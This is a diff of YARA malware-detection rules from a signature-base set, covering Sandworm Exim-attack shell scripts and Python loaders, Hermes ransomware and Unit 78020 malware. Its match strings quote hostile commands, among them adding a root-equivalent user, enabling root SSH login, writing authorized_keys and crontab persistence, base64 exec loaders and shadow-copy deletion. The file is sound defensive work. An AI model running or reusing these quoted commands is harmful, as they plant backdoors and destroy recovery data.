+		reference = "https://media.defense.gov/2020/May/28/2002306626/-1/-1/0/CSA%20Sandworm%20Actors%20Exploiting%20Vulnerability%20in%20Exim%20Transfer%20Agent%2020200528.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_sandworm_exim_expl.yar#L68-L84"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "0d310de1ab68bd6da9ae057c7edea0d6b24d408f85ec40c2306f1ac8a2bc2f55"
-		score = 40
+		logic_hash = "d052792a674dfa2d93a048b550ea085c3b9225662fdb09bf4a602093b0527e38"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "038ff8b2fef16f8ee9d70e6c219c5f380afe1a21761791e8cbda21fa4d09fdb4"
+		hash1 = "dc074464e50502459038ac127b50b8c68ed52817a61c2f97f0add33447c8f730"
+		hash2 = "538d713cb47a6b5ec6a3416404e0fc1ebcbc219a127315529f519f936420c80e"
 
 	strings:
-		$s1 = "PROT_EXEC|PROT_WRITE failed." fullword ascii
-		$s2 = "$Id: UPX" fullword ascii
-		$s3 = "$Info: This file is packed with the UPX executable packer" ascii
-		$fp1 = "check your UCL installation !"
+		$s1 = "mysql_db:x:" ascii
+		$a1 = "root:x:"
+		$a2 = "daemon:x:"
 
 	condition:
-		uint16( 0 ) == 0x457f and filesize < 2000KB and filesize > 30KB and 2 of ( $s* ) and not 1 of ( $fp* )
+		filesize < 4KB and all of them
 }
-rule SIGNATURE_BASE_Emissary_APT_Malware_1 : FILE
+rule SIGNATURE_BASE_APT_WEBSHELL_PHP_Sandworm_May20_1 : FILE
 {
 	meta:
-		description = "Detects Emissary Malware - from samples A08E81B411.DAT, ishelp.dll"
+		description = "Detects GIF header PHP webshell used by Sandworm on compromised machines"
 		author = "Florian Roth (Nextron Systems)"
-		id = "ae6ff471-9255-52a3-89d2-452eb2556184"
-		date = "2016-01-02"
+		id = "b9ec02c2-fa83-5f21-95cf-3528047b2d01"
+		date = "2020-05-28"
 		modified = "2023-12-05"
-		reference = "http://goo.gl/V0epcf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_emissary.yar#L8-L43"
+		reference = "https://media.defense.gov/2020/May/28/2002306626/-1/-1/0/CSA%20Sandworm%20Actors%20Exploiting%20Vulnerability%20in%20Exim%20Transfer%20Agent%2020200528.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_sandworm_exim_expl.yar#L86-L101"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "cab20ac0c17dcc5cb9d0c9f4cffe47e5880acd9dee935cb0eb1ef59579a23f17"
+		logic_hash = "0d10f618c7b465c7691d6054e994a76f56c12eb0a36d2d98b5accd2c1e2c1da7"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "9420017390c598ee535c24f7bcbd39f40eca699d6c94dc35bcf59ddf918c59ab"
-		hash2 = "70561f58c9e5868f44169854bcc906001947d98d15e9b4d2fbabd1262d938629"
-		hash3 = "0e64e68f6f88b25530699a1cd12f6f2790ea98e6e8fa3b4bc279f8e5c09d7290"
-		hash4 = "69caa2a4070559d4cafdf79020c4356c721088eb22398a8740dea8d21ae6e664"
-		hash5 = "675869fac21a94c8f470765bc6dd15b17cc4492dd639b878f241a45b2c3890fc"
-		hash6 = "e817610b62ccd00bdfc9129f947ac7d078d97525e9628a3aa61027396dba419b"
-		hash7 = "a8b0d084949c4f289beb4950f801bf99588d1b05f68587b245a31e8e82f7a1b8"
-		hash8 = "acf7dc5a10b00f0aac102ecd9d87cd94f08a37b2726cb1e16948875751d04cc9"
-		hash9 = "e21b47dfa9e250f49a3ab327b7444902e545bed3c4dcfa5e2e990af20593af6d"
-		hash10 = "e369417a7623d73346f6dff729e68f7e057f7f6dae7bb03d56a7510cb3bfe538"
-		hash11 = "29d8dc863427c8e37b75eb738069c2172e79607acc7b65de6f8086ba36abf051"
-		hash12 = "98fb1d2975babc18624e3922406545458642e01360746870deee397df93f50e0"
-		hash13 = "fbcb401cf06326ab4bb53fb9f01f1ca647f16f926811ea66984f1a1b8cf2f7bb"
+		hash1 = "dc074464e50502459038ac127b50b8c68ed52817a61c2f97f0add33447c8f730"
+		hash2 = "538d713cb47a6b5ec6a3416404e0fc1ebcbc219a127315529f519f936420c80e"
 
 	strings:
-		$s1 = "cmd.exe /c %s > %s" fullword ascii
-		$s2 = "execute cmd timeout." fullword ascii
-		$s3 = "rundll32.exe \"%s\",Setting" fullword ascii
-		$s4 = "DownloadFile - exception:%s." fullword ascii
-		$s5 = "CDllApp::InitInstance() - Evnet create successful." fullword ascii
-		$s6 = "UploadFile - EncryptBuffer Error" fullword ascii
-		$s7 = "WinDLL.dll" fullword wide
-		$s8 = "DownloadFile - exception:%s,code:0x%08x." fullword ascii
-		$s9 = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" fullword ascii
-		$s10 = "CDllApp::InitInstance() - Evnet already exists." fullword ascii
+		$h1 = "GIF89a <?php $" ascii
+		$s1 = "str_replace(" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 250KB and 3 of them
+		filesize < 10KB and $h1 at 0 and $s1
 }
-rule SIGNATURE_BASE_Foudre_Backdoor_1 : FILE
+rule SIGNATURE_BASE_APT_SH_Sandworm_Shell_Script_May20_1 : FILE
 {
 	meta:
-		description = "Detects Foudre Backdoor"
+		description = "Detects shell script used by Sandworm in attack against Exim mail server"
 		author = "Florian Roth (Nextron Systems)"
-		id = "ab2d43f4-fc35-5980-9b5d-98c5c4cfd012"
-		date = "2017-08-01"
+		id = "21cf2c89-5511-5eb6-a2dd-4ad54ebfa2d1"
+		date = "2020-05-28"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/Nbqbt6"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_foudre.yar#L13-L29"
+		reference = "https://media.defense.gov/2020/May/28/2002306626/-1/-1/0/CSA%20Sandworm%20Actors%20Exploiting%20Vulnerability%20in%20Exim%20Transfer%20Agent%2020200528.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_sandworm_exim_expl.yar#L103-L129"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "e42959162017ddf6da1d0b2950096e93e0e98c3e5f88ae28fc48e82ef98ca87b"
+		logic_hash = "b9116585e74ad6159cd31c0c8a84566f981a62ca5b5f82ace8b855a180461071"
 		score = 75
-		quality = 85
+		quality = 60
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "7e73a727dc8f3c48e58468c3fd0a193a027d085f25fa274a6e187cf503f01f74"
-		hash2 = "7ce2c5111e3560aa6036f98b48ceafe83aa1ac3d3b33392835316c859970f8bc"
+		hash1 = "dc074464e50502459038ac127b50b8c68ed52817a61c2f97f0add33447c8f730"
+		hash2 = "538d713cb47a6b5ec6a3416404e0fc1ebcbc219a127315529f519f936420c80e"
 
 	strings:
-		$s1 = "initialization failed: Reinstall the program" fullword wide
-		$s2 = "SnailDriver V1" fullword wide
-		$s3 = "lp.ini" fullword wide
+		$x1 = "echo \"GRANT ALL PRIVILEGES ON * . * TO 'mysqldb'@'localhost';\" >> init-file.txt" ascii fullword
+		$x2 = "import base64,sys;exec(base64.b64decode({2:str,3:lambda b:bytes(b,'UTF-8')}[sys.version" ascii fullword
+		$x3 = "sed -i -e '/PasswordAuthentication/s/no/yes/g; /PermitRootLogin/s/no/yes/g;" ascii fullword
+		$x4 = "useradd -M -l -g root -G root -b /root -u 0 -o mysql_db" ascii fullword
+		$s1 = "/ip.php?port=${PORT}\"" ascii fullword
+		$s2 = "sed -i -e '/PasswordAuthentication" ascii fullword
+		$s3 = "PATH_KEY=/root/.ssh/authorized_keys" ascii fullword
+		$s4 = "CREATE USER" ascii fullword
+		$s5 = "crontab -l | { cat; echo" ascii fullword
+		$s6 = "mysqld --user=mysql --init-file=/etc/opt/init-file.txt --console" ascii fullword
+		$s7 = "sshkey.php" ascii fullword
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 100KB and 2 of them )
+		uint16( 0 ) == 0x2123 and filesize < 20KB and 1 of ( $x* ) or 4 of them
 }
-rule SIGNATURE_BASE_Foudre_Backdoor_Dropper_1 : FILE
+rule SIGNATURE_BASE_APT_RU_Sandworm_PY_May20_1 : FILE
 {
 	meta:
-		description = "Detects Foudre Backdoor"
+		description = "Detects Sandworm Python loader"
 		author = "Florian Roth (Nextron Systems)"
-		id = "38c7d05b-d545-53c5-8db7-a7925b5b7838"
-		date = "2017-08-01"
-		modified = "2023-01-07"
-		reference = "https://goo.gl/Nbqbt6"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_foudre.yar#L31-L51"
+		id = "a392d800-1fe8-5ae9-b813-e1dfcedecda6"
+		date = "2020-05-28"
+		modified = "2023-12-05"
+		reference = "https://twitter.com/billyleonard/status/1266054881225236482"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_sandworm_exim_expl.yar#L131-L148"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "77ae856e74ceb04e73c26154d7b4cf98ed0e1d8b9ac6ed78775becbff2473e13"
+		logic_hash = "2ccc4c7fc75c04cbcab34904de2e7ab055a15c1017ec0f8d01b06454f4395047"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "6bc9f6ac2f6688ed63baa29913eaf8c64738cf19933d974d25a0c26b7d01b9ac"
-		hash2 = "da228831089c56743d1fbc8ef156c672017cdf46a322d847a270b9907def53a5"
+		hash1 = "c025008463fdbf44b2f845f2d82702805d931771aea4b506573b83c8f58bccca"
 
 	strings:
-		$x1 = "536F594A96C5496CB3949A4DA4775B576E049C57696E646F77735C43757272656E7456657273696F6E5C5C52756E" fullword wide
-		$x2 = "2220263024C380B3278695851482EC32" fullword wide
-		$s1 = "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\\\Startup\\" wide
-		$s2 = "C:\\Documents and Settings\\All Users\\" wide
-		$s3 = "Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\\\Shell Folders" wide
-		$s4 = "ShellExecuteW" fullword wide
+		$x1 = "o.addheaders=[('User-Agent','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko')]" ascii fullword
+		$s1 = "exec(o.open('http://" ascii
+		$s2 = "__import__({2:'urllib2',3:'urllib.request'}"
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 100KB and ( 1 of ( $x* ) or 4 of them ) )
+		uint16( 0 ) == 0x6d69 and filesize < 1KB and 1 of ( $x* ) or 2 of them
 }
-
-rule SIGNATURE_BASE_Foudre_Backdoor_Component_1 : FILE
+rule SIGNATURE_BASE_APT_RU_Sandworm_PY_May20_2 : FILE
 {
 	meta:
-		description = "Detects Foudre Backdoor"
+		description = "Detects Sandworm Python loader"
 		author = "Florian Roth (Nextron Systems)"
-		id = "9070f581-64a7-5620-aff4-7f2cbd73099d"
-		date = "2017-08-01"
-		modified = "2023-01-07"
-		reference = "https://goo.gl/Nbqbt6"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_foudre.yar#L53-L75"
+		id = "5b32ad64-d959-5632-a03c-17aa055b213f"
+		date = "2020-05-28"
+		modified = "2023-12-05"
+		reference = "https://twitter.com/billyleonard/status/1266054881225236482"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_sandworm_exim_expl.yar#L150-L167"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "2eb267ab93c297101aef0cfcca78d0299ca7baa96b983a5f2ff547394cbac82d"
+		logic_hash = "5fb61a9cef64ecf97adc78bf67db667cfd9e5e6f3e03f1bba8f3cdbf6c257520"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "7c6206eaf0c5c9c6c8d8586a626b49575942572c51458575e51cba72ba2096a4"
-		hash2 = "db605d501d3a5ca2b0e3d8296d552fbbf048ee831be21efca407c45bf794b109"
+		hash1 = "abfa83cf54db8fa548942acd845b4f34acc94c46d4e1fb5ce7e97cc0c6596676"
 
 	strings:
-		$s1 = { 50 72 6F 6A 65 63 74 31 2E 64 6C 6C 00 44 31 }
-		$s2 = "winmgmts:\\\\localhost\\root\\SecurityCenter2" fullword wide
-		$s3 = "C:\\Documents and Settings\\All Users\\" wide
+		$x1 = "import sys;import re, subprocess;cmd" ascii fullword
+		$x2 = "UA='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';server='http"
+		$x3 = "';t='/admin/get.php';req" ascii
+		$x4 = "ps -ef | grep Little\\ Snitch | grep " ascii fullword
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 2000KB and ( 3 of them ) or ( 2 of them and pe.exports ( "D1" ) ) )
+		uint16( 0 ) == 0x6d69 and filesize < 2KB and 1 of them
 }
-rule SIGNATURE_BASE_Foudre_Backdoor_SFX : FILE
+rule SIGNATURE_BASE_Hermes2_1 : FILE
 {
 	meta:
-		description = "Detects Foudre Backdoor SFX"
-		author = "Florian Roth (Nextron Systems)"
-		id = "b5c7cd6b-48c8-5703-b695-19d226de1810"
-		date = "2017-08-01"
+		description = "Detects Hermes Ransomware as used in BAE report on FEIB"
+		author = "BAE"
+		id = "13397a43-04e1-5cc1-9260-9895736013f3"
+		date = "2017-10-11"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/Nbqbt6"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_foudre.yar#L77-L93"
+		reference = "https://baesystemsai.blogspot.de/2017/10/taiwan-heist-lazarus-tools.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_hermes_ransom.yar#L1-L27"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "dd5492f5314cb87fdb7c8b29bdf31e1fcd8541ed47b20f309538437d9c6ac600"
+		hash = "b27881f59c8d8cc529fa80a58709db36"
+		logic_hash = "85a7b3ec89f2bf32e5520a7c5c84661383be71abd8dae3d072d75d5b1118db24"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "2b37ce9e31625d8b9e51b88418d4bf38ed28c77d98ca59a09daab01be36d405a"
-		hash2 = "4d51a0ea4ecc62456295873ff135e4d94d5899c4de749621bafcedbf4417c472"
 
 	strings:
-		$s1 = "main.exe" fullword ascii
-		$s2 = "pub.key" fullword ascii
-		$s3 = "WinRAR self-extracting archive" fullword wide
+		$s1 = "SYSTEM\\CurrentControlSet\\Control\\Nls\\Language\\"
+		$s2 = "0419"
+		$s3 = "0422"
+		$s4 = "0423"
+		$S1 = "HERMES"
+		$S2 = "vssadminn"
+		$S3 = "finish work"
+		$S4 = "testlib.dll"
+		$S5 = "shadowstorageiet"
+		$u1 = "ALKnvfoi4tbmiom3t40iomfr0i3t4jmvri3tb4mvi3btv3rgt4t777"
+		$u2 = "HERMES 2.1 TEST BUILD, press ok"
+		$u3 = "hnKwtMcOadHwnXutKHqPvpgfysFXfAFTcaDHNdCnktA"
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 2000KB and all of them )
+		uint16( 0 ) == 0x5a4d and all of ( $s* ) and 3 of ( $S* ) and 1 of ( $u* )
 }
-rule SIGNATURE_BASE_Destructive_Ransomware_Gen1 : FILE
+rule SIGNATURE_BASE_APT_MAL_CN_Unit78020_Sep15 : FILE
 {
 	meta:
-		description = "Detects destructive malware"
+		description = "Detects malware used by Unit78020"
 		author = "Florian Roth (Nextron Systems)"
-		id = "3a7ce55e-fb28-577b-91bb-fe02d7b3d73c"
-		date = "2018-02-12"
-		modified = "2023-12-05"
-		reference = "http://blog.talosintelligence.com/2018/02/olympic-destroyer.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_olympic_destroyer.yar#L13-L28"
+		id = "d26d401f-3806-5a0b-bdb3-87d5d8af209c"
+		date = "2015-09-24"
+		modified = "2023-01-31"
+		old_rule_name = "Unit78020_Malware_Gen1"
+		reference = "http://threatconnect.com/camerashy/?utm_campaign=CameraShy"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_unit78020_malware.yar#L8-L58"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "1f7a41c5a7e812e0e26b346cc6465290b17aff31620cbcf6e01c569d8eea2dbd"
-		score = 75
-		quality = 85
+		logic_hash = "85244d4e2b9e03fa4ab8268ffbedffb839bca598b1e863d3d0b3914294d3ddf0"
+		score = 80
+		quality = 83
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "ae9a4e244a9b3c77d489dee8aeaf35a7c3ba31b210e76d81ef2e91790f052c85"
+		hash1 = "2b15e614fb54bca7031f64ab6caa1f77b4c07dac186826a6cd2e254090675d72"
+		hash2 = "76c586e89c30a97e583c40ebe3f4ba75d5e02e52959184c4ce0a46b3aac54edd"
+		hash3 = "7b73bf2d80a03eb477242967628da79924fbe06cc67c4dcdd2bdefccd6e0e1af"
+		hash4 = "2625a0d91d3cdbbc7c4a450c91e028e3609ff96c4f2a5a310ae20f73e1bc32ac"
+		hash5 = "5c62b1d16e6180f22a0cb59c99a7743f44cb4a41e4e090b9733d1fb687c8efa2"
+		hash6 = "88c5be84afe20c91e4024160303bafb044f98aa5fbf8c9f9997758a014238790"
 
 	strings:
-		$x1 = "/set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no" fullword wide
-		$x2 = "delete shadows /all /quiet" fullword wide
-		$x3 = "delete catalog -quiet" fullword wide
+		$x1 = "greensky27.vicp.net" fullword wide
+		$x2 = "POST http://%s:%d/aspxabcdefg.asp?%s HTTP/1.1" fullword ascii
+		$x3 = "GET http://%s:%d/aspxabcdef.asp?%s HTTP/1.1" fullword ascii
+		$x4 = "serch.vicp.net" fullword wide
+		$x5 = "greensky27.vicp.net" fullword wide
+		$x6 = "greensky27.vicp.net.as" fullword wide
+		$x7 = "greensky27.vcip.net" fullword wide
+		$x8 = "pnoc-ec.vicp.net" fullword wide
+		$x9 = "aseanph.vicp.net" fullword wide
+		$x10 = "pnoc.vicp.net" fullword wide
+		$sa1 = "dMozilla/4.0 (compatible; MSIE 6.0;Windows NT 5.0; .NET CLR 1.1.4322)" wide fullword
+		$sa2 = "x-www-form-urlencoded/r/n" wide fullword
+		$sa3 = "/%d%s%d" ascii fullword
+		$sa4 = "dMozilla" wide fullword
+		$sa5 = "Accept-Language:En-us" wide fullword
+		$sb1 = "%USERPROFILE%\\Application Data\\Mozilla\\Firefox\\Profiles" wide fullword
+		$sb2 = "\\Office Start.lnk" wide fullword
+		$sb3 = "%02d-%02d-%02d %02d:%02d" wide fullword
+		$sc1 = "\\MSN Talk Start.lnk" wide fullword
+		$sc2 = "-GetModuleFileNameExW" ascii fullword
+		$sc3 = "dwError1 = %d" ascii fullword
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 100KB and 1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 2000KB and ( 1 of ( $x* ) or all of ( $sa* ) or all of ( $sb* ) or all of ( $sc* ) )
 }
-
-rule SIGNATURE_BASE_Olympicdestroyer_Gen2 : FILE
+rule SIGNATURE_BASE_Unit78020_Malware_1 : FILE
 {
 	meta:
-		description = "Detects Olympic Destroyer malware"
+		description = "Detects malware by Chinese APT PLA Unit 78020 - Specific Rule - msictl.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "8d0cbb7b-6650-53ed-8d58-176f8b4af880"
-		date = "2018-02-12"
+		id = "0374de68-98cb-5cb8-a936-fe7845de9330"
+		date = "2015-09-24"
 		modified = "2023-12-05"
-		reference = "http://blog.talosintelligence.com/2018/02/olympic-destroyer.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_olympic_destroyer.yar#L30-L60"
+		reference = "http://threatconnect.com/camerashy/?utm_campaign=CameraShy"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_unit78020_malware.yar#L60-L78"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "1bcf0e95d9de62271a09f6ac64ce65debc91e541e1fccfe5c31661466c00bd5e"
+		hash = "a93d01f1cc2d18ced2f3b2b78319aadc112f611ab8911ae9e55e13557c1c791a"
+		logic_hash = "589dfb39630fd396b1f8c5d9d0ecccfc058edfd8e74e3bd06d1bfb9f91ad1798"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "d934cb8d0eadb93f8a57a9b8853c5db218d5db78c16a35f374e413884d915016"
-		hash2 = "3e27b6b287f0b9f7e85bfe18901d961110ae969d58b44af15b1d75be749022c2"
-		hash3 = "edb1ff2521fb4bf748111f92786d260d40407a2e8463dcd24bb09f908ee13eb9"
-		hash4 = "28858cc6e05225f7d156d1c6a21ed11188777fa0a752cb7b56038d79a88627cc"
 
 	strings:
-		$x1 = "cmd.exe /c (ping 0.0.0.0 > nul) && if exist %programdata%\\evtchk.txt" fullword wide
-		$x2 = "cmd.exe /c (echo strPath = Wscript.ScriptFullName & echo.Set FSO = CreateObject^(\"Scripting.FileSystemObject\"^)" wide
-		$x3 = "del %programdata%\\evtchk.txt" fullword wide
-		$x4 = "Pyeongchang2018.com\\svc_all_swd_installc" fullword ascii
-		$s1 = "<STARTCRED>" fullword wide
-		$s2 = "SELECT ds_cn FROM ds_computer" fullword wide
-		$s3 = "\\system32\\notepad.exe" wide
-		$s4 = "%s \\\\%s -u \"%s\" -p \"%s\" -accepteula -d %s %s \"%s\"" fullword ascii
+		$s1 = "%ProgramFiles%\\Internet Explorer\\iexplore.exe" fullword ascii
+		$s2 = "msictl.exe" fullword ascii
+		$s3 = "127.0.0.1:8080" fullword ascii
+		$s4 = "mshtml.dat" fullword ascii
+		$s5 = "msisvc" fullword ascii
+		$s6 = "NOKIAN95/WEB" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 5000KB and ( pe.imphash ( ) == "fd7200dcd5c0d9d4d277a26d951210aa" or pe.imphash ( ) == "975087e9286238a80895b195efb3968d" or pe.imphash ( ) == "da1c2d7acfe54df797bfb1f470257bc3" or 1 of ( $x* ) or 3 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 160KB and 4 of them
 }
-rule SIGNATURE_BASE_Casper_Backdoor_X86 : FILE
+rule SIGNATURE_BASE_Unit78020_Malware_Gen2 : FILE
 {
 	meta:
-		description = "Casper French Espionage Malware - Win32/ProxyBot.B - x86 Payload http://goo.gl/VRJNLo"
+		description = "Detects malware by Chinese APT PLA Unit 78020 - Generic Rule"
 		author = "Florian Roth (Nextron Systems)"
-		id = "9e54f00c-74a7-56cc-87e5-8dec1233cbb5"
-		date = "2015-03-05"
-		modified = "2023-01-27"
-		reference = "http://goo.gl/VRJNLo"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_casper.yar#L4-L35"
+		id = "9492b1f8-c2a9-5e3b-ad62-fbc3d99392b3"
+		date = "2015-09-24"
+		modified = "2023-12-05"
+		reference = "http://threatconnect.com/camerashy/?utm_campaign=CameraShy"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_unit78020_malware.yar#L80-L101"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "f4c39eddef1c7d99283c7303c1835e99d8e498b0"
-		logic_hash = "027457a3d86c0a7924fd6eb09c4a753cc846ba45f0b04257d9eec396bbc27f75"
-		score = 80
+		logic_hash = "fd3cb904499a985830543174126761a3cdcff134d61b93b1105a489c00bd042f"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash1 = "76c586e89c30a97e583c40ebe3f4ba75d5e02e52959184c4ce0a46b3aac54edd"
+		hash2 = "7b73bf2d80a03eb477242967628da79924fbe06cc67c4dcdd2bdefccd6e0e1af"
+		hash3 = "981e2fa1ae4145359036b46e8b53cc5da37dd2311204859761bd91572f025e8a"
 
 	strings:
-		$s1 = "\"svchost.exe\"" fullword wide
-		$s2 = "firefox.exe" fullword ascii
-		$s3 = "\"Host Process for Windows Services\"" fullword wide
-		$x1 = "\\Users\\*" ascii
-		$x2 = "\\Roaming\\Mozilla\\Firefox\\Profiles\\*" ascii
-		$x3 = "\\Mozilla\\Firefox\\Profiles\\*" ascii
-		$x4 = "\\Documents and Settings\\*" ascii
-		$y1 = "%s; %S=%S" fullword wide
-		$y2 = "%s; %s=%s" fullword ascii
-		$y3 = "Cookie: %s=%s" fullword ascii
-		$y4 = "http://%S:%d" fullword wide
-		$z1 = "http://google.com/" ascii
-		$z2 = "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MALC)" fullword ascii
-		$z3 = "Operating System\"" fullword wide
+		$s0 = "-GetModuleFileNameExW" fullword ascii
+		$s1 = "\\MSN Talk Start.lnk" wide
+		$s2 = ":SeDebugPrivilege" fullword wide
+		$s3 = "WinMM Version 1.0" fullword wide
+		$s4 = "dwError1 = %d" fullword ascii
+		$s5 = "*Can't Get" fullword wide
 
 	condition:
-		( filesize < 250KB and all of ( $s* ) ) or ( 3 of ( $x* ) and 2 of ( $y* ) and 2 of ( $z* ) )
+		uint16( 0 ) == 0x5a4d and filesize < 1000KB and all of them
 }
-rule SIGNATURE_BASE_Casper_EXE_Dropper
+rule SIGNATURE_BASE_Unit78020_Malware_Gen3 : FILE
 {
 	meta:
-		description = "Casper French Espionage Malware - Win32/ProxyBot.B - Dropper http://goo.gl/VRJNLo"
+		description = "Detects malware by Chinese APT PLA Unit 78020 - Generic Rule - Chong"
 		author = "Florian Roth (Nextron Systems)"
-		id = "a901d045-6f9b-57e8-8347-6f78178b7231"
-		date = "2015-03-05"
+		id = "e26f386e-e98c-5005-9343-1873d2e35a1f"
+		date = "2015-09-24"
 		modified = "2023-12-05"
-		reference = "http://goo.gl/VRJNLo"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_casper.yar#L37-L58"
+		reference = "http://threatconnect.com/camerashy/?utm_campaign=CameraShy"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_unit78020_malware.yar#L103-L132"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "e4cc35792a48123e71a2c7b6aa904006343a157a"
-		logic_hash = "8ffba5598078fdadf2d9e8ee7fe0fef8b3b89517490a379d46cab33cd0036d6e"
-		score = 80
+		logic_hash = "304b3f429e144f1f4b0f7794e77f3059ec6b3e5c6fdf4c7b820a77db1cf8cfcb"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash1 = "2625a0d91d3cdbbc7c4a450c91e028e3609ff96c4f2a5a310ae20f73e1bc32ac"
+		hash2 = "5c62b1d16e6180f22a0cb59c99a7743f44cb4a41e4e090b9733d1fb687c8efa2"
 
 	strings:
-		$s0 = "<Command>" fullword ascii
-		$s1 = "</Command>" fullword ascii
-		$s2 = "\" /d \"" fullword ascii
-		$s4 = "'%s' %s" fullword ascii
-		$s5 = "nKERNEL32.DLL" fullword wide
-		$s6 = "@ReturnValue" fullword wide
-		$s7 = "ID: 0x%x" fullword ascii
-		$s8 = "Name: %S" fullword ascii
+		$x1 = "GET http://%ws:%d/%d%s%dHTTP/1.1" fullword ascii
+		$x2 = "POST http://%ws:%d/%d%s%dHTTP/1.1" fullword ascii
+		$x3 = "J:\\chong\\" ascii
+		$s1 = "User-Agent: Netscape" fullword ascii
+		$s2 = "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-EN; rv:1.7.12) Gecko/20100719 Firefox/1.0.7" fullword ascii
+		$s3 = "Software\\Microsoft\\Windows\\CurrentVersion\\explorer\\User Shell Folders" fullword wide
